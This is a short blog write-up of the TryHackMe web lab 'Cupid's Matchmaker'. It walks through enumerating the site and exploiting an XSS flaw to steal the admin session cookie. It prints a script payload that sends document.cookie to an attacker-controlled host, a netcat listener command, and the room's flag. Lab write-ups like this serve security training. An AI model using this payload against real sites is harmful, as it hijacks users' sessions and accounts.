DEATHESTHER
← All write-ups

TRYHACKME WRITE-UP

Cupid's Matchmaker - TryHackMe writeup

Use your web exploitation skills against this matchmaking service.

EasyWebXSS2 min read

Open the room on TryHackMe ↗ View on GitHub

Task 1. Cupids Matchmaker

What is the flag?

THM{XSS_CuP1d_Str1k3s_Ag41n}

Initial Access

The lab already provides the target IP and port for the web service, so I went straight to the application in the browser to begin interacting with it.

image

Navigating the Application

Once the page loaded, I noticed a survey form as the main interaction point. This looked like the primary functionality of the application, so I proceeded by filling it out.

image

After submitting the survey, the application returned a response page.

image

Web Enumeration

To understand the attack surface better, I started enumerating available endpoints and directories.

image

During enumeration, I discovered an /admin page. Naturally, I accessed it to see if there was any direct entry point.

image

The page did not immediately reveal anything useful, and my initial attempts did not lead to progress. At this point, I reviewed my approach and identified that the application was likely vulnerable to client-side injection.

Exploiting XSS to Capture Admin Cookie

The application allowed input that was reflected back, which opened the possibility of exploiting a Cross Site Scripting vulnerability. I crafted a payload to capture the admin's session cookie.

<script>fetch('http://<ip>:8000/?c='+document.cookie)</script>

Before triggering the payload, I set up a listener to catch the incoming request:

nc -lnvp 8000

I then injected the payload through the application input.

image

After triggering it, I received a connection on my listener containing the admin cookie.

image

Decoding the Cookie

With the captured cookie, I proceeded to decode it to extract meaningful information.

image

Flag

THM{XSS_CuP1d_Str1k3s_Ag41n}

Thanks for reading.